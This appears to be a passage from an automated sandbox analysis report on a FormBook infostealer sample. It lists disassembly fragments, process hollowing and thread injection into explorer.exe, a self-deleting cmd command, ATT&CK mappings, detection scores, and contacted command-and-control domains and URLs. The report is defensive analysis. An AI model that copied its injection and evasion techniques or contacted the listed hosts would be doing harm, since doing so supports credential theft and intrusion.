          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_036E138A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_03631B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_03631B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_036DD380 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_03652397 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_0365B390 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_036DB260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_036DB260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_036F8A62 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_0366927A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_03629240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_03629240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_03629240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_03629240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_036EEA55 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_036B4257 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_03664A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_03664A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_0364A229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_0364A229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_0364A229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_0364A229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_0364A229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_0364A229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_0364A229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_0364A229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_0364A229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_03638A0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_03625210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_03625210 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_03625210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_03625210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_0362AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_0362AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_03643A1C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_036EAA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_036EAA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_03652AE4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_03652ACB mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_036252A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_036252A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_036252A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_036252A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_036252A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_0363AAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_0363AAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_0365FAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_0365D294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_0365D294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_0362C962 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_0362B171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_0362B171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_0364B944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_0364B944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_03644120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_03644120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_03644120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_03644120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_03644120 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_0365513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_0365513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_03629100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_03629100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_03629100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_036B41E8 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_0362B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_0362B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_0362B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_036561A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_036561A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_036E49A4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_036E49A4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_036E49A4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_036E49A4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_036A69A6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_036A51BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_036A51BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_036A51BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_036A51BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_036499BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_036499BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_036499BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_036499BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_036499BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_036499BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_036499BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_036499BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_036499BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_036499BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_036499BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_036499BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_0365A185 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_0364C182 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_03652990 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_036F1074 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_036E2073 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_03640050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_03640050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_0365002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_0365002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_0365002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_0365002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_0365002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_0363B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_0363B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_0363B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_0363B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_0364A830 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exeProcess token adjusted: Debug
          Source: C:\Windows\SysWOW64\help.exeProcess token adjusted: Debug

          HIPS / PFW / Operating System Protection Evasion:

          barindex
          System process connects to network (likely due to code injection or exploit)Show sources
          Source: C:\Windows\explorer.exeDomain query: www.vacalinda.com
          Source: C:\Windows\explorer.exeDomain query: www.servicesbackyard.com
          Source: C:\Windows\explorer.exeDomain query: www.caravansforsalenorthwales.com
          Source: C:\Windows\explorer.exeNetwork Connect: 142.250.180.243 80
          Source: C:\Windows\explorer.exeDomain query: www.djspencer.com
          Source: C:\Windows\explorer.exeNetwork Connect: 34.102.136.180 80
          Source: C:\Windows\explorer.exeNetwork Connect: 168.235.88.209 80
          Source: C:\Windows\explorer.exeNetwork Connect: 159.89.244.183 80
          Maps a DLL or memory area into another processShow sources
          Source: C:\Users\user\Desktop\SX365783909782021.exeSection loaded: unknown target: C:\Users\user\Desktop\SX365783909782021.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\SX365783909782021.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\SX365783909782021.exeSection loaded: unknown target: C:\Windows\SysWOW64\help.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\SX365783909782021.exeSection loaded: unknown target: C:\Windows\SysWOW64\help.exe protection: execute and read and write
          Source: C:\Windows\SysWOW64\help.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read write
          Source: C:\Windows\SysWOW64\help.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Modifies the context of a thread in another process (thread injection)Show sources
          Source: C:\Users\user\Desktop\SX365783909782021.exeThread register set: target process: 3388
          Source: C:\Windows\SysWOW64\help.exeThread register set: target process: 3388
          Queues an APC in another process (thread injection)Show sources
          Source: C:\Users\user\Desktop\SX365783909782021.exeThread APC queued: target process: C:\Windows\explorer.exe
          Sample uses process hollowing techniqueShow sources
          Source: C:\Users\user\Desktop\SX365783909782021.exeSection unmapped: C:\Windows\SysWOW64\help.exe base address: BB0000
          Source: C:\Users\user\Desktop\SX365783909782021.exeProcess created: C:\Users\user\Desktop\SX365783909782021.exe 'C:\Users\user\Desktop\SX365783909782021.exe'
          Source: C:\Windows\SysWOW64\help.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\SX365783909782021.exe'
          Source: explorer.exe, 00000003.00000000.214211632.0000000001398000.00000004.00000020.sdmpBinary or memory string: ProgmanamF
          Source: explorer.exe, 00000003.00000000.214392871.0000000001980000.00000002.00000001.sdmp, help.exe, 00000005.00000002.476078258.0000000004A90000.00000002.00000001.sdmpBinary or memory string: Program Manager
          Source: explorer.exe, 00000003.00000000.214392871.0000000001980000.00000002.00000001.sdmp, help.exe, 00000005.00000002.476078258.0000000004A90000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
          Source: explorer.exe, 00000003.00000000.214392871.0000000001980000.00000002.00000001.sdmp, help.exe, 00000005.00000002.476078258.0000000004A90000.00000002.00000001.sdmpBinary or memory string: Progman
          Source: explorer.exe, 00000003.00000000.214392871.0000000001980000.00000002.00000001.sdmp, help.exe, 00000005.00000002.476078258.0000000004A90000.00000002.00000001.sdmpBinary or memory string: Progmanlock
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 0_2_00405B88 GetVersion,GetSystemDirectoryA,GetWindowsDirectoryA,SHGetSpecialFolderLocation,SHGetPathFromIDListA,CoTaskMemFree,lstrcatA,lstrlenA,

          Stealing of Sensitive Information:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000002.00000002.258574044.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.473754310.0000000003200000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000001.209804420.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.258786803.00000000005B0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.211210535.00000000022B0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.258837957.0000000000710000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.472090660.0000000000C30000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 2.2.SX365783909782021.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.1.SX365783909782021.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.1.SX365783909782021.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.SX365783909782021.exe.22b0000.3.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.SX365783909782021.exe.22b0000.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.SX365783909782021.exe.400000.0.raw.unpack, type: UNPACKEDPE

          Remote Access Functionality:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000002.00000002.258574044.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.473754310.0000000003200000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000001.209804420.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.258786803.00000000005B0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.211210535.00000000022B0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.258837957.0000000000710000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.472090660.0000000000C30000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 2.2.SX365783909782021.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.1.SX365783909782021.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.1.SX365783909782021.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.SX365783909782021.exe.22b0000.3.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.SX365783909782021.exe.22b0000.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.SX365783909782021.exe.400000.0.raw.unpack, type: UNPACKEDPE

          Mitre Att&ck Matrix

          Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
          Valid AccountsNative API1Path InterceptionProcess Injection512Rootkit1Credential API Hooking1Security Software Discovery131Remote ServicesCredential API Hooking1Exfiltration Over Other Network MediumEncrypted Channel1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationSystem Shutdown/Reboot1
          Default AccountsShared Modules1Boot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsVirtualization/Sandbox Evasion3LSASS MemoryVirtualization/Sandbox Evasion3Remote Desktop ProtocolArchive Collected Data1Exfiltration Over BluetoothIngress Tool Transfer1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
          Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Process Injection512Security Account ManagerProcess Discovery2SMB/Windows Admin SharesClipboard Data1Automated ExfiltrationNon-Application Layer Protocol2Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
          Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Deobfuscate/Decode Files or Information1NTDSRemote System Discovery1Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol12SIM Card SwapCarrier Billing Fraud
          Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptObfuscated Files or Information3LSA SecretsFile and Directory Discovery2SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
          Replication Through Removable MediaLaunchdRc.commonRc.commonSoftware Packing11Cached Domain CredentialsSystem Information Discovery13VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 signatures2 2 Behavior Graph ID: 433214 Sample: SX365783909782021.bat Startdate: 11/06/2021 Architecture: WINDOWS Score: 100 36 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->36 38 Found malware configuration 2->38 40 Malicious sample detected (through community Yara rule) 2->40 42 5 other signatures 2->42 10 SX365783909782021.exe 20 2->10         started        process3 file4 28 C:\Users\user\AppData\Local\...\System.dll, PE32 10->28 dropped 52 Detected unpacking (changes PE section rights) 10->52 54 Maps a DLL or memory area into another process 10->54 56 Tries to detect virtualization through RDTSC time measurements 10->56 14 SX365783909782021.exe 10->14         started        signatures5 process6 signatures7 58 Modifies the context of a thread in another process (thread injection) 14->58 60 Maps a DLL or memory area into another process 14->60 62 Sample uses process hollowing technique 14->62 64 Queues an APC in another process (thread injection) 14->64 17 explorer.exe 14->17 injected process8 dnsIp9 30 www.djspencer.com 159.89.244.183, 49741, 80 DIGITALOCEAN-ASNUS United States 17->30 32 www.vacalinda.com 17->32 34 5 other IPs or domains 17->34 44 System process connects to network (likely due to code injection or exploit) 17->44 21 help.exe 17->21         started        signatures10 process11 signatures12 46 Modifies the context of a thread in another process (thread injection) 21->46 48 Maps a DLL or memory area into another process 21->48 50 Tries to detect virtualization through RDTSC time measurements 21->50 24 cmd.exe 1 21->24         started        process13 process14 26 conhost.exe 24->26         started       

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.

          windows-stand

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          SourceDetectionScannerLabelLink
          SX365783909782021.exe32%VirustotalBrowse
          SX365783909782021.exe39%ReversingLabsWin32.Spyware.Noon
          SX365783909782021.exe100%Joe Sandbox ML

          Dropped Files

          SourceDetectionScannerLabelLink
          C:\Users\user\AppData\Local\Temp\nsvDA2D.tmp\System.dll0%MetadefenderBrowse
          C:\Users\user\AppData\Local\Temp\nsvDA2D.tmp\System.dll0%ReversingLabs

          Unpacked PE Files

          SourceDetectionScannerLabelLinkDownload
          0.0.SX365783909782021.exe.400000.0.unpack100%AviraHEUR/AGEN.1137482Download File
          0.2.SX365783909782021.exe.400000.0.unpack100%AviraHEUR/AGEN.1137482Download File
          2.2.SX365783909782021.exe.400000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          5.2.help.exe.3b2f834.5.unpack100%AviraTR/Patched.Ren.GenDownload File
          2.0.SX365783909782021.exe.400000.0.unpack100%AviraHEUR/AGEN.1137482Download File
          2.1.SX365783909782021.exe.400000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          5.2.help.exe.d3d870.2.unpack100%AviraTR/Patched.Ren.GenDownload File
          0.2.SX365783909782021.exe.22b0000.3.unpack100%AviraTR/Crypt.ZPACK.GenDownload File

          Domains

          SourceDetectionScannerLabelLink
          ghs.googlehosted.com0%VirustotalBrowse
          caravansforsalenorthwales.com0%VirustotalBrowse

          URLs

          SourceDetectionScannerLabelLink
          http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
          http://www.djspencer.com/ngvm/?w6A=HBVp1ZFUGcT+hxfW3ntFEbmU5GO8vrkA1mLmG5vd048TCTgwy52mAcu3AE2RaU7PuRfb&3fox=SBZ40%Avira URL Cloudsafe
          http://www.tiro.com0%URL Reputationsafe
          http://www.tiro.com0%URL Reputationsafe
          http://www.tiro.com0%URL Reputationsafe
          http://www.caravansforsalenorthwales.com/ngvm/?w6A=uz7CW46zGnQqpjgqznnFmpPrWAklZoEybcG+oUJN9dvYL4OpOEr/HbmCuGHk2zZbqVpb&3fox=SBZ40%Avira URL Cloudsafe
          www.moneyhuntercom.info/ngvm/0%Avira URL Cloudsafe
          http://www.goodfont.co.kr0%URL Reputationsafe
          http://www.goodfont.co.kr0%URL Reputationsafe
          http://www.goodfont.co.kr0%URL Reputationsafe
          http://www.carterandcone.coml0%URL Reputationsafe
          http://www.carterandcone.coml0%URL Reputationsafe
          http://www.carterandcone.coml0%URL Reputationsafe
          http://www.sajatypeworks.com0%URL Reputationsafe
          http://www.sajatypeworks.com0%URL Reputationsafe
          http://www.sajatypeworks.com0%URL Reputationsafe
          http://www.typography.netD0%URL Reputationsafe
          http://www.typography.netD0%URL Reputationsafe
          http://www.typography.netD0%URL Reputationsafe
          http://www.vacalinda.com/ngvm/?w6A=st23zvU/E1xU5Qy7Hp2PD30UnMfCa5knANSLf3ItiB6oVvQd6+qg6yvUWRtcyiXbPLds&3fox=SBZ40%Avira URL Cloudsafe
          http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
          http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
          http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
          http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
          http://www.servicesbackyard.com/ngvm/?w6A=UyLqygKx2FmdGYSRh5mqmU7zHOPmyh0H52xSnc3cVgCKFPBqoRmOJ0eYguKTgHZNEA4k&3fox=SBZ40%Avira URL Cloudsafe
          http://fontfabrik.com0%URL Reputationsafe
          http://fontfabrik.com0%URL Reputationsafe
          http://fontfabrik.com0%URL Reputationsafe
          http://www.founder.com.cn/cn0%URL Reputationsafe
          http://www.founder.com.cn/cn0%URL Reputationsafe
          http://www.founder.com.cn/cn0%URL Reputationsafe
          http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
          http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
          http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
          http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
          http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
          http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
          http://www.sandoll.co.kr0%URL Reputationsafe
          http://www.sandoll.co.kr0%URL Reputationsafe
          http://www.sandoll.co.kr0%URL Reputationsafe
          http://www.urwpp.deDPlease0%URL Reputationsafe
          http://www.urwpp.deDPlease0%URL Reputationsafe
          http://www.urwpp.deDPlease0%URL Reputationsafe
          http://www.zhongyicts.com.cn0%URL Reputationsafe
          http://www.zhongyicts.com.cn0%URL Reputationsafe
          http://www.zhongyicts.com.cn0%URL Reputationsafe
          http://www.sakkal.com0%URL Reputationsafe
          http://www.sakkal.com0%URL Reputationsafe
          http://www.sakkal.com0%URL Reputationsafe

          Domains and IPs

          Contacted Domains

          NameIPActiveMaliciousAntivirus DetectionReputation
          parking.namesilo.com
          		168.235.88.209
          		truefalse
            		high
            www.djspencer.com
            		159.89.244.183
            		truetrue
              		unknown
              ghs.googlehosted.com
              		142.250.180.243
              		truefalseunknown
              caravansforsalenorthwales.com
              		34.102.136.180
              		truefalseunknown
              www.vacalinda.com
              		unknown
              		unknowntrue
                		unknown
                www.servicesbackyard.com
                		unknown
                		unknowntrue
                  		unknown
                  www.caravansforsalenorthwales.com
                  		unknown
                  		unknowntrue
                    		unknown

                    Contacted URLs

                    NameMaliciousAntivirus DetectionReputation
                    http://www.djspencer.com/ngvm/?w6A=HBVp1ZFUGcT+hxfW3ntFEbmU5GO8vrkA1mLmG5vd048TCTgwy52mAcu3AE2RaU7PuRfb&3fox=SBZ4true
                    • Avira URL Cloud: safe
                    		unknown
                    http://www.caravansforsalenorthwales.com/ngvm/?w6A=uz7CW46zGnQqpjgqznnFmpPrWAklZoEybcG+oUJN9dvYL4OpOEr/HbmCuGHk2zZbqVpb&3fox=SBZ4false
                    • Avira URL Cloud: safe
                    		unknown
                    www.moneyhuntercom.info/ngvm/true
                    • Avira URL Cloud: safe
                    		low
                    http://www.vacalinda.com/ngvm/?w6A=st23zvU/E1xU5Qy7Hp2PD30UnMfCa5knANSLf3ItiB6oVvQd6+qg6yvUWRtcyiXbPLds&3fox=SBZ4false
                    • Avira URL Cloud: safe
                    		unknown
                    http://www.servicesbackyard.com/ngvm/?w6A=UyLqygKx2FmdGYSRh5mqmU7zHOPmyh0H52xSnc3cVgCKFPBqoRmOJ0eYguKTgHZNEA4k&3fox=SBZ4true
                    • Avira URL Cloud: safe
                    		unknown

                    URLs from Memory and Binaries

                    NameSourceMaliciousAntivirus DetectionReputation
                    http://www.apache.org/licenses/LICENSE-2.0explorer.exe, 00000003.00000000.227163717.0000000008B46000.00000002.00000001.sdmpfalse
                      		high
                      http://www.fontbureau.comexplorer.exe, 00000003.00000000.227163717.0000000008B46000.00000002.00000001.sdmpfalse
                        		high
                        http://www.fontbureau.com/designersGexplorer.exe, 00000003.00000000.227163717.0000000008B46000.00000002.00000001.sdmpfalse
                          		high
                          http://www.fontbureau.com/designers/?explorer.exe, 00000003.00000000.227163717.0000000008B46000.00000002.00000001.sdmpfalse
                            		high
                            http://www.founder.com.cn/cn/bTheexplorer.exe, 00000003.00000000.227163717.0000000008B46000.00000002.00000001.sdmpfalse
                            • URL Reputation: safe
                            • URL Reputation: safe
                            • URL Reputation: safe
                            		unknown
                            http://www.fontbureau.com/designers?explorer.exe, 00000003.00000000.227163717.0000000008B46000.00000002.00000001.sdmpfalse
                              		high
